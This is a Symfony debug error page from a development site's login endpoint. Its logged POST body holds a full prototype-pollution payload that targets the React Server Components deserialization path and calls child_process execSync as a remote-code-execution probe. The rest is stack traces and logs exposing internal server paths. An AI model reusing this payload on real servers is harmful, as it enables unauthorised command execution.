Error 500 Internal Server Error

GET https://main-dev.2d-armony.it/login

ErrorController

Request

GET Parameters

No GET parameters

POST Parameters

Key Value
0
"{"then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});", "_chunks": "$Q2", "_formData": {"get": "$1:constructor:constructor"}}}"
1
""$@0""
2
"[]"

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_controller
"error_controller"
_stopwatch_token
"eea3de"
exception
TypeError {#404
  #message: "Symfony\Component\Security\Http\Authenticator\Passport\Badge\UserBadge::__construct(): Argument #1 ($userIdentifier) must be of type string, null given, called in /var/www/main-dev.2d-armony.it/Symfony/src/Security/App2DSaasAuthenticator.php on line 92"
  #code: 0
  #file: "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Authenticator/Passport/Badge/UserBadge.php"
  #line: 52
  trace: {
    /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Authenticator/Passport/Badge/UserBadge.php:52 {
      Symfony\Component\Security\Http\Authenticator\Passport\Badge\UserBadge->__construct(string $userIdentifier, ?callable $userLoader = null, ?array $attributes = null) …
      ›  */public function __construct(string $userIdentifier, ?callable $userLoader = null, ?array $attributes = null){
    }
    /var/www/main-dev.2d-armony.it/Symfony/src/Security/App2DSaasAuthenticator.php:92 {
      App\Security\App2DSaasAuthenticator->authenticate(Request $request): Passport …
      › return new Passport(\r    new UserBadge( $username, function( $userIdentifier ) {\r        $user = $this->em->getRepository( User::class ) ->findOneBy( [ 'username' => $userIdentifier ] );\r
    }
    /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticator.php:70 {
      Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticator->authenticate(Request $request): Passport …
      › $startTime = microtime(true);$this->passport = $this->authenticator->authenticate($request);$this->duration = microtime(true) - $startTime;
    }
    /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Authentication/AuthenticatorManager.php:176 {
      Symfony\Component\Security\Http\Authentication\AuthenticatorManager->executeAuthenticator(AuthenticatorInterface $authenticator, Request $request): Response …
      › // get the passport from the Authenticator$passport = $authenticator->authenticate($request);}
    /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Authentication/AuthenticatorManager.php:158 {
      Symfony\Component\Security\Http\Authentication\AuthenticatorManager->executeAuthenticators(array $authenticators, Request $request): Response …
      › 
      › $response = $this->executeAuthenticator($authenticator, $request);if (null !== $response) {
    }
    /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Authentication/AuthenticatorManager.php:140 {
      Symfony\Component\Security\Http\Authentication\AuthenticatorManager->authenticateRequest(Request $request): Response …
      › 
      ›     return $this->executeAuthenticators($authenticators, $request);}
    }
    /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Firewall/AuthenticatorManagerListener.php:40 {
      Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener->authenticate(RequestEvent $event): void …
      › $request = $event->getRequest();$response = $this->authenticatorManager->authenticateRequest($request);if (null === $response) {
    }
    /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticatorManagerListener.php:68 {
      Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticatorManagerListener->authenticate(RequestEvent $event): void …
      › 
      › $this->authenticationManagerListener->authenticate($event);}
    /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php:46 {
      Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener->authenticate(RequestEvent $event): void …
      › try {    $this->listener->authenticate($event);} catch (LazyResponseException $e) {
    }
    /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Firewall/AbstractListener.php:26 {
      Symfony\Component\Security\Http\Firewall\AbstractListener->__invoke(RequestEvent $event): void …
      › if (false !== $this->supports($event->getRequest())) {    $this->authenticate($event);}
    }
    /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php:83 {
      Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener->callListeners(RequestEvent $event, iterable $listeners): void …
      › $wrappedListener = $listener instanceof FirewallListenerInterface ? new WrappedLazyListener($listener) : new WrappedListener($listener);$wrappedListener($event);$wrappedListeners[] = $wrappedListener->getInfo();
    }
    /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Firewall.php:95 {
      Symfony\Component\Security\Http\Firewall->onKernelRequest(RequestEvent $event) …
      › 
      ›     $this->callListeners($event, $authenticationListeners());}
    }
    /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/event-dispatcher/Debug/WrappedListener.php:116 {
      Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object $event, string $eventName, EventDispatcherInterface $dispatcher): void …
      › try {    ($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher);} finally {
    }
    /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/event-dispatcher/EventDispatcher.php:220 {
      Symfony\Component\EventDispatcher\EventDispatcher->callListeners(iterable $listeners, string $eventName, object $event) …
      ›     }    $listener($event, $eventName, $this);}
    }
    /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/event-dispatcher/EventDispatcher.php:56 {
      Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object $event, ?string $eventName = null): object …
      › if ($listeners) {    $this->callListeners($listeners, $eventName, $event);}
    }
    /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:139 {
      Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object $event, ?string $eventName = null): object …
      › try {    $this->dispatcher->dispatch($event, $eventName);} finally {
    }
    /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/http-kernel/HttpKernel.php:157 {
      Symfony\Component\HttpKernel\HttpKernel->handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response …
      › $event = new RequestEvent($this, $request, $type);$this->dispatcher->dispatch($event, KernelEvents::REQUEST);}
    /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/http-kernel/HttpKernel.php:76 {
      Symfony\Component\HttpKernel\HttpKernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true): Response …
      › try {    return $response = $this->handleRaw($request, $type);} catch (\Throwable $e) {
    }
    /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/http-kernel/Kernel.php:197 {
      Symfony\Component\HttpKernel\Kernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true): Response …
      › try {    return $this->getHttpKernel()->handle($request, $type, $catch);} finally {
    }
    /var/www/main-dev.2d-armony.it/Symfony/public/index.php:30 {$request = Request::createFromGlobals();$response = $kernel->handle($request);$response->send();
    }
  }
}
logger
Symfony\Bridge\Monolog\Processor\DebugProcessor {#985
  -records: [
    14 => [
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.706+01:00"
        "message" => "Matched route "{route}"."
        "priority" => 200
        "priorityName" => "INFO"
        "context" => [
          "route" => "app_login"
          "route_parameters" => [
            "_route" => "app_login"
            "mode" => "NORMAL"
            "_controller" => "App\Controller\DefaultController::login"
          ]
          "request_uri" => "https://main-dev.2d-armony.it/login"
          "method" => "POST"
        ]
        "channel" => "request"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.707+01:00"
        "message" => "LocaleListener - onKernelRequest => START"
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => []
        "channel" => "app"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.710+01:00"
        "message" => "Checking for authenticator support."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "firewall_name" => "main"
          "authenticators" => 3
        ]
        "channel" => "security"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.710+01:00"
        "message" => "Checking support on authenticator."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "firewall_name" => "main"
          "authenticator" => "App\Security\App2DSaasAuthenticator"
        ]
        "channel" => "security"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.710+01:00"
        "message" => "Checking support on authenticator."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "firewall_name" => "main"
          "authenticator" => "Symfony\Component\Security\Http\Authenticator\FormLoginAuthenticator"
        ]
        "channel" => "security"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.710+01:00"
        "message" => "Authenticator does not support the request."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "firewall_name" => "main"
          "authenticator" => "Symfony\Component\Security\Http\Authenticator\FormLoginAuthenticator"
        ]
        "channel" => "security"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.710+01:00"
        "message" => "Checking support on authenticator."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "firewall_name" => "main"
          "authenticator" => "Symfony\Component\Security\Http\Authenticator\HttpBasicAuthenticator"
        ]
        "channel" => "security"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.710+01:00"
        "message" => "Authenticator does not support the request."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "firewall_name" => "main"
          "authenticator" => "Symfony\Component\Security\Http\Authenticator\HttpBasicAuthenticator"
        ]
        "channel" => "security"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.716+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.request"
          "listener" => "Symfony\Component\HttpKernel\EventListener\DebugHandlersListener::configure"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.716+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.request"
          "listener" => "Symfony\Component\HttpKernel\EventListener\ValidateRequestListener::onKernelRequest"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.716+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.request"
          "listener" => "Symfony\Component\HttpKernel\EventListener\SessionListener::onKernelRequest"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.716+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.request"
          "listener" => "Symfony\Component\HttpKernel\EventListener\LocaleListener::setDefaultLocale"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.716+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.request"
          "listener" => "Symfony\Component\HttpKernel\EventListener\RouterListener::onKernelRequest"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.716+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.request"
          "listener" => "App\EventListener\LocaleListener::onKernelRequest"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.716+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.request"
          "listener" => "Symfony\Component\HttpKernel\EventListener\LocaleListener::onKernelRequest"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.716+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.request"
          "listener" => "Symfony\Component\HttpKernel\EventListener\LocaleAwareListener::onKernelRequest"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.716+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.request"
          "listener" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener::configureLogoutUrlGenerator"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.716+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.request"
          "listener" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener::onKernelRequest"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.758+01:00"
        "message" => "PHP Exception (0 | 512): Symfony\Component\Security\Http\Authenticator\Passport\Badge\UserBadge::__construct(): Argument #1 ($userIdentifier) must be of type string, null given, called in /var/www/main-dev.2d-armony.it/Symfony/src/Security/App2DSaasAuthenticator.php on line 92 at /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Authenticator/Passport/Badge/UserBadge.php line 52"
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          [
            "file" => "/var/www/main-dev.2d-armony.it/Symfony/src/Security/App2DSaasAuthenticator.php"
            "line" => 92
            "function" => "__construct"
            "class" => "Symfony\Component\Security\Http\Authenticator\Passport\Badge\UserBadge"
            "type" => "->"
          ]
          [
            "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticator.php"
            "line" => 70
            "function" => "authenticate"
            "class" => "App\Security\App2DSaasAuthenticator"
            "type" => "->"
          ]
          [
            "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
            "line" => 176
            "function" => "authenticate"
            "class" => "Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticator"
            "type" => "->"
          ]
          [
            "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
            "line" => 158
            "function" => "executeAuthenticator"
            "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
            "type" => "->"
          ]
          [
            "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
            "line" => 140
            "function" => "executeAuthenticators"
            "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
            "type" => "->"
          ]
          [
            "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Firewall/AuthenticatorManagerListener.php"
            "line" => 40
            "function" => "authenticateRequest"
            "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
            "type" => "->"
          ]
          [
            "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticatorManagerListener.php"
            "line" => 68
            "function" => "authenticate"
            "class" => "Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener"
            "type" => "->"
          ]
          [
            "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php"
            "line" => 46
            "function" => "authenticate"
            "class" => "Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticatorManagerListener"
            "type" => "->"
          ]
          [
            "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Firewall/AbstractListener.php"
            "line" => 26
            "function" => "authenticate"
            "class" => "Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener"
            "type" => "->"
          ]
          [
            "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php"
            "line" => 83
            "function" => "__invoke"
            "class" => "Symfony\Component\Security\Http\Firewall\AbstractListener"
            "type" => "->"
          ]
          [
            "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Firewall.php"
            "line" => 95
            "function" => "callListeners"
            "class" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener"
            "type" => "->"
          ]
          [
            "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
            "line" => 116
            "function" => "onKernelRequest"
            "class" => "Symfony\Component\Security\Http\Firewall"
            "type" => "->"
          ]
          [
            "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/event-dispatcher/EventDispatcher.php"
            "line" => 220
            "function" => "__invoke"
            "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
            "type" => "->"
          ]
          [
            "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/event-dispatcher/EventDispatcher.php"
            "line" => 56
            "function" => "callListeners"
            "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
            "type" => "->"
          ]
          [
            "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
            "line" => 139
            "function" => "dispatch"
            "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
            "type" => "->"
          ]
          [
            "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/http-kernel/HttpKernel.php"
            "line" => 157
            "function" => "dispatch"
            "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
            "type" => "->"
          ]
          [
            "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/http-kernel/HttpKernel.php"
            "line" => 76
            "function" => "handleRaw"
            "class" => "Symfony\Component\HttpKernel\HttpKernel"
            "type" => "->"
          ]
          [
            "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/http-kernel/Kernel.php"
            "line" => 197
            "function" => "handle"
            "class" => "Symfony\Component\HttpKernel\HttpKernel"
            "type" => "->"
          ]
          [
            "file" => "/var/www/main-dev.2d-armony.it/Symfony/public/index.php"
            "line" => 30
            "function" => "handle"
            "class" => "Symfony\Component\HttpKernel\Kernel"
            "type" => "->"
          ]
        ]
        "channel" => "security"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.763+01:00"
        "message" => "Uncaught PHP Exception TypeError: "Symfony\Component\Security\Http\Authenticator\Passport\Badge\UserBadge::__construct(): Argument #1 ($userIdentifier) must be of type string, null given, called in /var/www/main-dev.2d-armony.it/Symfony/src/Security/App2DSaasAuthenticator.php on line 92" at UserBadge.php line 52"
        "priority" => 500
        "priorityName" => "CRITICAL"
        "context" => [
          "exception" => TypeError {#404
            #message: "Symfony\Component\Security\Http\Authenticator\Passport\Badge\UserBadge::__construct(): Argument #1 ($userIdentifier) must be of type string, null given, called in /var/www/main-dev.2d-armony.it/Symfony/src/Security/App2DSaasAuthenticator.php on line 92"
            #code: 0
            #file: "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Authenticator/Passport/Badge/UserBadge.php"
            #line: 52
            trace: {
              /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Authenticator/Passport/Badge/UserBadge.php:52 {
                Symfony\Component\Security\Http\Authenticator\Passport\Badge\UserBadge->__construct(string $userIdentifier, ?callable $userLoader = null, ?array $attributes = null) …
                ›  */public function __construct(string $userIdentifier, ?callable $userLoader = null, ?array $attributes = null){
              }
              /var/www/main-dev.2d-armony.it/Symfony/src/Security/App2DSaasAuthenticator.php:92 {
                App\Security\App2DSaasAuthenticator->authenticate(Request $request): Passport …
                › return new Passport(\r    new UserBadge( $username, function( $userIdentifier ) {\r        $user = $this->em->getRepository( User::class ) ->findOneBy( [ 'username' => $userIdentifier ] );\r
              }
              /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticator.php:70 {
                Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticator->authenticate(Request $request): Passport …
                › $startTime = microtime(true);$this->passport = $this->authenticator->authenticate($request);$this->duration = microtime(true) - $startTime;
              }
              /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Authentication/AuthenticatorManager.php:176 {
                Symfony\Component\Security\Http\Authentication\AuthenticatorManager->executeAuthenticator(AuthenticatorInterface $authenticator, Request $request): Response …
                › // get the passport from the Authenticator$passport = $authenticator->authenticate($request);}
              /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Authentication/AuthenticatorManager.php:158 {
                Symfony\Component\Security\Http\Authentication\AuthenticatorManager->executeAuthenticators(array $authenticators, Request $request): Response …
                › 
                › $response = $this->executeAuthenticator($authenticator, $request);if (null !== $response) {
              }
              /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Authentication/AuthenticatorManager.php:140 {
                Symfony\Component\Security\Http\Authentication\AuthenticatorManager->authenticateRequest(Request $request): Response …
                › 
                ›     return $this->executeAuthenticators($authenticators, $request);}
              }
              /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Firewall/AuthenticatorManagerListener.php:40 {
                Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener->authenticate(RequestEvent $event): void …
                › $request = $event->getRequest();$response = $this->authenticatorManager->authenticateRequest($request);if (null === $response) {
              }
              /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticatorManagerListener.php:68 {
                Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticatorManagerListener->authenticate(RequestEvent $event): void …
                › 
                › $this->authenticationManagerListener->authenticate($event);}
              /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php:46 {
                Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener->authenticate(RequestEvent $event): void …
                › try {    $this->listener->authenticate($event);} catch (LazyResponseException $e) {
              }
              /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Firewall/AbstractListener.php:26 {
                Symfony\Component\Security\Http\Firewall\AbstractListener->__invoke(RequestEvent $event): void …
                › if (false !== $this->supports($event->getRequest())) {    $this->authenticate($event);}
              }
              /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php:83 {
                Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener->callListeners(RequestEvent $event, iterable $listeners): void …
                › $wrappedListener = $listener instanceof FirewallListenerInterface ? new WrappedLazyListener($listener) : new WrappedListener($listener);$wrappedListener($event);$wrappedListeners[] = $wrappedListener->getInfo();
              }
              /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Firewall.php:95 {
                Symfony\Component\Security\Http\Firewall->onKernelRequest(RequestEvent $event) …
                › 
                ›     $this->callListeners($event, $authenticationListeners());}
              }
              /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/event-dispatcher/Debug/WrappedListener.php:116 {
                Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object $event, string $eventName, EventDispatcherInterface $dispatcher): void …
                › try {    ($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher);} finally {
              }
              /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/event-dispatcher/EventDispatcher.php:220 {
                Symfony\Component\EventDispatcher\EventDispatcher->callListeners(iterable $listeners, string $eventName, object $event) …
                ›     }    $listener($event, $eventName, $this);}
              }
              /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/event-dispatcher/EventDispatcher.php:56 {
                Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object $event, ?string $eventName = null): object …
                › if ($listeners) {    $this->callListeners($listeners, $eventName, $event);}
              }
              /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:139 {
                Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object $event, ?string $eventName = null): object …
                › try {    $this->dispatcher->dispatch($event, $eventName);} finally {
              }
              /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/http-kernel/HttpKernel.php:157 {
                Symfony\Component\HttpKernel\HttpKernel->handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response …
                › $event = new RequestEvent($this, $request, $type);$this->dispatcher->dispatch($event, KernelEvents::REQUEST);}
              /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/http-kernel/HttpKernel.php:76 {
                Symfony\Component\HttpKernel\HttpKernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true): Response …
                › try {    return $response = $this->handleRaw($request, $type);} catch (\Throwable $e) {
              }
              /var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/http-kernel/Kernel.php:197 {
                Symfony\Component\HttpKernel\Kernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true): Response …
                › try {    return $this->getHttpKernel()->handle($request, $type, $catch);} finally {
              }
              /var/www/main-dev.2d-armony.it/Symfony/public/index.php:30 {$request = Request::createFromGlobals();$response = $kernel->handle($request);$response->send();
              }
            }
          }
        ]
        "channel" => "request"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.930+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.exception"
          "listener" => "Symfony\Component\Security\Http\Firewall\ExceptionListener::onKernelException"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.930+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.exception"
          "listener" => "App\EventListener\TwoDIExceptionListener::onKernelException"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.931+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.exception"
          "listener" => "Symfony\Component\HttpKernel\EventListener\ErrorListener::logKernelException"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.931+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.exception"
          "listener" => "Symfony\Component\HttpKernel\EventListener\ProfilerListener::onKernelException"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.931+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.exception"
          "listener" => "Symfony\Component\HttpKernel\EventListener\RouterListener::onKernelException"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.931+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.exception"
          "listener" => "Symfony\Component\HttpKernel\EventListener\ErrorListener::onKernelException"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.931+01:00"
        "message" => "Listener "{listener}" stopped propagation of the event "{event}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.exception"
          "listener" => "Symfony\Component\HttpKernel\EventListener\ErrorListener::onKernelException"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.932+01:00"
        "message" => "Executing query: {sql}"
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "sql" => "SELECT DATABASE()"
        ]
        "channel" => "doctrine"
      ]
      [
        "timestamp" => 1765926544
        "timestamp_rfc3339" => "2025-12-17T00:09:04.359+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.response"
          "listener" => "Symfony\Component\Security\Http\Firewall\ContextListener::onKernelResponse"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926544
        "timestamp_rfc3339" => "2025-12-17T00:09:04.359+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.response"
          "listener" => "Symfony\Component\Security\Http\Firewall\ContextListener::onKernelResponse"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926544
        "timestamp_rfc3339" => "2025-12-17T00:09:04.359+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.response"
          "listener" => "Symfony\Component\HttpKernel\EventListener\ResponseListener::onKernelResponse"
        ]
        "channel" => "event"
